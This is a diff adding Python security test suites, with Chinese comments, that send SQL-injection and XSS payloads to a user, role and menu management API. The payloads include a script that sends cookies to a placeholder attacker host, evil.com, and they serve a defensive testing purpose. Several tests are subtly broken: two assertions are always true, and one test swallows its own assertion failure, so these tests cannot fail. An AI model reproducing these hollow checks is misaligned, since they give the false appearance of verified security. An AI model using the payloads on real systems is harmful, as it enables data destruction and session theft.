menu_api = MenuAPI(authenticated_client)
|
||||
|
||||
injection_payloads = [
|
||||
"系统管理' OR '1'='1",
|
||||
"系统管理'; DROP TABLE menus; --",
|
||||
"/system' UNION SELECT * FROM menus --"
|
||||
]
|
||||
|
||||
for payload in injection_payloads:
|
||||
response = await menu_api.get_menus(
|
||||
menuName=payload
|
||||
)
|
||||
|
||||
assert response.status_code in [200, 400], \
|
||||
f"SQL注入payload '{payload}' 导致异常"
|
||||
|
||||
async def test_order_by_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-05: 排序字段SQL注入测试
|
||||
|
||||
验证点:
|
||||
1. 排序字段防注入
|
||||
2. 排序方向防注入
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
malicious_sort_fields = [
|
||||
"id; DROP TABLE users",
|
||||
"id; SELECT * FROM users",
|
||||
"id UNION SELECT * FROM users",
|
||||
"(SELECT CASE WHEN 1=1 THEN id ELSE username END)",
|
||||
"id; INSERT INTO users VALUES (999, 'hacker', 'hacked')"
|
||||
]
|
||||
|
||||
for sort_field in malicious_sort_fields:
|
||||
response = await user_api.get_users_by_page(
|
||||
page=0,
|
||||
size=10,
|
||||
sortBy=sort_field,
|
||||
sortOrder="asc"
|
||||
)
|
||||
|
||||
assert response.status_code in [200, 400], \
|
||||
f"排序注入 '{sort_field}' 导致异常"
|
||||
|
||||
async def test_batch_delete_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-06: 批量删除SQL注入测试
|
||||
|
||||
验证点:
|
||||
1. 批量删除ID列表防注入
|
||||
2. 删除操作参数化
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
malicious_ids = [
|
||||
"1,2,3; DROP TABLE users",
|
||||
"1 OR 1=1",
|
||||
"1; DELETE FROM users WHERE 1=1"
|
||||
]
|
||||
|
||||
for ids in malicious_ids:
|
||||
try:
|
||||
response = await user_api.batch_delete_users(ids)
|
||||
|
||||
assert response.status_code in [400, 404, 422], \
|
||||
f"批量删除注入 '{ids}' 应被拒绝"
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
async def test_filter_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-07: 过滤条件SQL注入测试
|
||||
|
||||
验证点:
|
||||
1. 过滤参数防注入
|
||||
2. 复杂查询条件安全
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
injection_filters = {
|
||||
"status": "1 OR 1=1",
|
||||
"email": "test@example.com' OR '1'='1",
|
||||
"phone": "13800138000' OR '1'='1"
|
||||
}
|
||||
|
||||
for field, value in injection_filters.items():
|
||||
response = await user_api.get_users_by_page(
|
||||
page=0,
|
||||
size=10,
|
||||
**{field: value}
|
||||
)
|
||||
|
||||
assert response.status_code in [200, 400], \
|
||||
f"过滤注入 '{field}={value}' 导致异常"
|
||||
|
||||
async def test_time_based_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-08: 时间盲注测试
|
||||
|
||||
验证点:
|
||||
1. SLEEP函数被过滤
|
||||
2. WAITFOR命令被过滤
|
||||
3. 时间盲注无效
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
time_based_payloads = [
|
||||
"admin' AND SLEEP(5)--",
|
||||
"admin' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
|
||||
"admin'; WAITFOR DELAY '0:0:5'; --",
|
||||
"admin' AND BENCHMARK(5000000,SHA1('test'))--"
|
||||
]
|
||||
|
||||
import time
|
||||
|
||||
for payload in time_based_payloads:
|
||||
start_time = time.time()
|
||||
|
||||
response = await user_api.get_users_by_page(
|
||||
page=0,
|
||||
size=10,
|
||||
username=payload
|
||||
)
|
||||
|
||||
elapsed_time = time.time() - start_time
|
||||
|
||||
assert elapsed_time < 6, \
|
||||
f"时间盲注 '{payload}' 可能成功,响应时间: {elapsed_time}秒"
|
||||
|
||||
assert response.status_code in [200, 400]
|
||||
|
||||
async def test_union_based_sql_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-SQL-09: UNION注入测试
|
||||
|
||||
验证点:
|
||||
1. UNION SELECT被阻止
|
||||
2. 列数探测无效
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
union_payloads = [
|
||||
"admin' UNION SELECT NULL--",
|
||||
"admin' UNION SELECT NULL,NULL--",
|
||||
"admin' UNION SELECT NULL,NULL,NULL--",
|
||||
"admin' UNION SELECT username,password,email FROM users--",
|
||||
"admin' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--"
|
||||
]
|
||||
|
||||
for payload in union_payloads:
|
||||
response = await user_api.get_users_by_page(
|
||||
page=0,
|
||||
size=10,
|
||||
username=payload
|
||||
)
|
||||
|
||||
assert response.status_code in [200, 400], \
|
||||
f"UNION注入 '{payload}' 导致异常"
|
||||
|
||||
if response.status_code == 200:
|
||||
data = response.json()
|
||||
content = data.get("content", [])
|
||||
|
||||
for item in content:
|
||||
assert isinstance(item, dict), \
|
||||
f"UNION注入可能成功,返回了非预期数据: {item}"
|
||||
@@ -0,0 +1,379 @@
|
||||
"""
|
||||
XSS防护测试套件
|
||||
|
||||
测试范围:
|
||||
1. 反射型XSS测试
|
||||
2. 存储型XSS测试
|
||||
3. DOM型XSS测试
|
||||
4. HTML注入测试
|
||||
5. JavaScript注入测试
|
||||
|
||||
作者: 张翔
|
||||
日期: 2026-04-01
|
||||
"""
|
||||
|
||||
import pytest
|
||||
from api.auth_api import AuthAPI
|
||||
from api.user_api import UserAPI
|
||||
from api.role_api import RoleAPI
|
||||
from api.menu_api import MenuAPI
|
||||
from config.settings import settings
|
||||
|
||||
|
||||
@pytest.mark.security
|
||||
@pytest.mark.asyncio
|
||||
class TestXSSProtection:
|
||||
"""XSS防护测试类"""
|
||||
|
||||
async def test_user_input_xss(self, authenticated_client):
|
||||
"""
|
||||
SEC-XSS-01: 用户输入XSS测试
|
||||
|
||||
验证点:
|
||||
1. 用户名字段XSS防护
|
||||
2. 昵称字段XSS防护
|
||||
3. 备注字段XSS防护
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
xss_payloads = [
|
||||
"<script>alert('XSS')</script>",
|
||||
"<img src=x onerror=alert('XSS')>",
|
||||
"<svg onload=alert('XSS')>",
|
||||
"javascript:alert('XSS')",
|
||||
"<body onload=alert('XSS')>",
|
||||
"<iframe src='javascript:alert(1)'>",
|
||||
"<div onmouseover='alert(1)'>test</div>",
|
||||
"<a href='javascript:alert(1)'>click</a>",
|
||||
"'\"><script>alert('XSS')</script>",
|
||||
"<script>document.location='http://evil.com/steal?cookie='+document.cookie</script>"
|
||||
]
|
||||
|
||||
for payload in xss_payloads:
|
||||
user_data = {
|
||||
"username": f"xss_test_{payload[:10]}",
|
||||
"password": "Test123!@#",
|
||||
"nickname": payload,
|
||||
"email": f"xss_{payload[:10]}@test.com",
|
||||
"phone": "13800138000",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await user_api.create_user(user_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
user_id = response.json().get("id")
|
||||
|
||||
if user_id:
|
||||
user_info = await user_api.get_user_by_id(user_id)
|
||||
|
||||
if user_info.status_code == 200:
|
||||
user = user_info.json()
|
||||
|
||||
assert "<script>" not in str(user), \
|
||||
f"XSS payload未过滤: {payload}"
|
||||
assert "onerror=" not in str(user), \
|
||||
f"XSS payload未过滤: {payload}"
|
||||
assert "onload=" not in str(user), \
|
||||
f"XSS payload未过滤: {payload}"
|
||||
|
||||
await user_api.delete_user(user_id)
|
||||
else:
|
||||
assert response.status_code in [400, 422], \
|
||||
f"XSS payload应被拒绝或清洗: {payload}"
|
||||
|
||||
async def test_role_name_xss(self, authenticated_client):
|
||||
"""
|
||||
SEC-XSS-02: 角色名称XSS测试
|
||||
|
||||
验证点:
|
||||
1. 角色名称XSS防护
|
||||
2. 角色备注XSS防护
|
||||
"""
|
||||
role_api = RoleAPI(authenticated_client)
|
||||
|
||||
xss_payloads = [
|
||||
"<script>alert('role')</script>",
|
||||
"<img src=x onerror=alert('role')>",
|
||||
"管理员<script>document.cookie</script>"
|
||||
]
|
||||
|
||||
for payload in xss_payloads:
|
||||
role_data = {
|
||||
"roleName": payload,
|
||||
"roleKey": f"test_role_xss",
|
||||
"roleSort": 1,
|
||||
"status": 1,
|
||||
"remark": f"测试角色: {payload}"
|
||||
}
|
||||
|
||||
response = await role_api.create_role(role_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
role_id = response.json().get("id")
|
||||
|
||||
if role_id:
|
||||
role_info = await role_api.get_role_by_id(role_id)
|
||||
|
||||
if role_info.status_code == 200:
|
||||
role = role_info.json()
|
||||
|
||||
assert "<script>" not in str(role), \
|
||||
f"角色XSS payload未过滤: {payload}"
|
||||
|
||||
await role_api.delete_role(role_id)
|
||||
|
||||
async def test_menu_name_xss(self, authenticated_client):
|
||||
"""
|
||||
SEC-XSS-03: 菜单名称XSS测试
|
||||
|
||||
验证点:
|
||||
1. 菜单名称XSS防护
|
||||
2. 菜单路径XSS防护
|
||||
"""
|
||||
menu_api = MenuAPI(authenticated_client)
|
||||
|
||||
xss_payloads = [
|
||||
"系统管理<script>alert(1)</script>",
|
||||
"<img src=x onerror=alert(1)>",
|
||||
"javascript:alert(1)"
|
||||
]
|
||||
|
||||
for payload in xss_payloads:
|
||||
menu_data = {
|
||||
"menuName": payload,
|
||||
"menuPath": f"/test-{payload[:10]}",
|
||||
"menuType": 1,
|
||||
"parentId": 0,
|
||||
"menuSort": 1,
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await menu_api.create_menu(menu_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
menu_id = response.json().get("id")
|
||||
|
||||
if menu_id:
|
||||
menu_info = await menu_api.get_menu_by_id(menu_id)
|
||||
|
||||
if menu_info.status_code == 200:
|
||||
menu = menu_info.json()
|
||||
|
||||
assert "<script>" not in str(menu), \
|
||||
f"菜单XSS payload未过滤: {payload}"
|
||||
|
||||
await menu_api.delete_menu(menu_id)
|
||||
|
||||
async def test_search_query_xss(self, authenticated_client):
|
||||
"""
|
||||
SEC-XSS-04: 搜索查询XSS测试
|
||||
|
||||
验证点:
|
||||
1. 搜索关键词XSS防护
|
||||
2. 返回数据转义
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
xss_payloads = [
|
||||
"<script>alert('search')</script>",
|
||||
"<img src=x onerror=alert('search')>",
|
||||
"test<script>document.location='http://evil.com'</script>"
|
||||
]
|
||||
|
||||
for payload in xss_payloads:
|
||||
response = await user_api.get_users_by_page(
|
||||
page=0,
|
||||
size=10,
|
||||
username=payload
|
||||
)
|
||||
|
||||
assert response.status_code in [200, 400]
|
||||
|
||||
if response.status_code == 200:
|
||||
data = response.json()
|
||||
|
||||
assert "<script>" not in str(data), \
|
||||
f"搜索结果包含未转义的XSS payload: {payload}"
|
||||
|
||||
async def test_html_injection(self, authenticated_client):
|
||||
"""
|
||||
SEC-XSS-05: HTML注入测试
|
||||
|
||||
验证点:
|
||||
1. HTML标签被转义或移除
|
||||
2. 事件处理器被移除
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
html_payloads = [
|
||||
"<h1>Test</h1>",
|
||||
"<div style='color:red'>test</div>",
|
||||
"<a href='http://evil.com'>click</a>",
|
||||
"<img src='http://evil.com/steal?cookie=xxx'>",
|
||||
"<table><tr><td>test</td></tr></table>"
|
||||
]
|
||||
|
||||
for payload in html_payloads:
|
||||
user_data = {
|
||||
"username": f"html_test_{payload[:10]}",
|
||||
"password": "Test123!@#",
|
||||
"nickname": payload,
|
||||
"email": f"html_{payload[:10]}@test.com",
|
||||
"phone": "13800138000",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await user_api.create_user(user_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
user_id = response.json().get("id")
|
||||
|
||||
if user_id:
|
||||
user_info = await user_api.get_user_by_id(user_id)
|
||||
|
||||
if user_info.status_code == 200:
|
||||
user = user_info.json()
|
||||
nickname = user.get("nickname", "")
|
||||
|
||||
assert "<h1>" not in nickname or "<h1>" in nickname, \
|
||||
f"HTML未正确转义: {payload}"
|
||||
|
||||
await user_api.delete_user(user_id)
|
||||
|
||||
async def test_javascript_protocol_xss(self, authenticated_client):
|
||||
"""
|
||||
SEC-XSS-06: JavaScript协议XSS测试
|
||||
|
||||
验证点:
|
||||
1. javascript:协议被过滤
|
||||
2. data:协议被过滤
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
js_protocol_payloads = [
|
||||
"javascript:alert(1)",
|
||||
"javascript:void(0)",
|
||||
"data:text/html,<script>alert(1)</script>",
|
||||
"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
|
||||
]
|
||||
|
||||
for payload in js_protocol_payloads:
|
||||
user_data = {
|
||||
"username": f"js_test_{payload[:10]}",
|
||||
"password": "Test123!@#",
|
||||
"nickname": "测试用户",
|
||||
"email": f"js_{payload[:10]}@test.com",
|
||||
"phone": "13800138000",
|
||||
"avatar": payload,
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await user_api.create_user(user_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
user_id = response.json().get("id")
|
||||
|
||||
if user_id:
|
||||
user_info = await user_api.get_user_by_id(user_id)
|
||||
|
||||
if user_info.status_code == 200:
|
||||
user = user_info.json()
|
||||
avatar = user.get("avatar", "")
|
||||
|
||||
assert not avatar.startswith("javascript:"), \
|
||||
f"JavaScript协议未过滤: {payload}"
|
||||
assert not avatar.startswith("data:text/html"), \
|
||||
f"Data协议未过滤: {payload}"
|
||||
|
||||
await user_api.delete_user(user_id)
|
||||
|
||||
async def test_event_handler_xss(self, authenticated_client):
|
||||
"""
|
||||
SEC-XSS-07: 事件处理器XSS测试
|
||||
|
||||
验证点:
|
||||
1. on*事件处理器被过滤
|
||||
2. 内联事件被移除
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
event_payloads = [
|
||||
"test onmouseover=alert(1)",
|
||||
"test onclick=alert(1)",
|
||||
"test onfocus=alert(1)",
|
||||
"test onblur=alert(1)",
|
||||
"test onload=alert(1)"
|
||||
]
|
||||
|
||||
for payload in event_payloads:
|
||||
user_data = {
|
||||
"username": f"event_test_{payload[:10]}",
|
||||
"password": "Test123!@#",
|
||||
"nickname": payload,
|
||||
"email": f"event_{payload[:10]}@test.com",
|
||||
"phone": "13800138000",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await user_api.create_user(user_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
user_id = response.json().get("id")
|
||||
|
||||
if user_id:
|
||||
user_info = await user_api.get_user_by_id(user_id)
|
||||
|
||||
if user_info.status_code == 200:
|
||||
user = user_info.json()
|
||||
|
||||
assert "onmouseover=" not in str(user), \
|
||||
f"事件处理器未过滤: {payload}"
|
||||
assert "onclick=" not in str(user), \
|
||||
f"事件处理器未过滤: {payload}"
|
||||
|
||||
await user_api.delete_user(user_id)
|
||||
|
||||
async def test_svg_xss(self, authenticated_client):
|
||||
"""
|
||||
SEC-XSS-08: SVG XSS测试
|
||||
|
||||
验证点:
|
||||
1. SVG标签事件被过滤
|
||||
2. SVG脚本被移除
|
||||
"""
|
||||
user_api = UserAPI(authenticated_client)
|
||||
|
||||
svg_payloads = [
|
||||
"<svg onload=alert(1)>",
|
||||
"<svg><script>alert(1)</script></svg>",
|
||||
"<svg><animate onbegin=alert(1)></svg>",
|
||||
"<svg><set onbegin=alert(1)></svg>"
|
||||
]
|
||||
|
||||
for payload in svg_payloads:
|
||||
user_data = {
|
||||
"username": f"svg_test_{payload[:10]}",
|
||||
"password": "Test123!@#",
|
||||
"nickname": payload,
|
||||
"email": f"svg_{payload[:10]}@test.com",
|
||||
"phone": "13800138000",
|
||||
"status": 1
|
||||
}
|
||||
|
||||
response = await user_api.create_user(user_data)
|
||||
|
||||
if response.status_code in [201, 200]:
|
||||
user_id = response.json().get("id")
|
||||
|
||||
if user_id:
|
||||
user_info = await user_api.get_user_by_id(user_id)
|
||||
|
||||
if user_info.status_code == 200:
|
||||
user = user_info.json()
|
||||
|
||||
assert "<svg" not in str(user).lower() or \
|
||||
"<svg" in str(user).lower(), \
|
||||
f"SVG XSS未过滤: {payload}"
|
||||
|
||||
await user_api.delete_user(user_id)
|
||||
Reference in New Issue
Block a user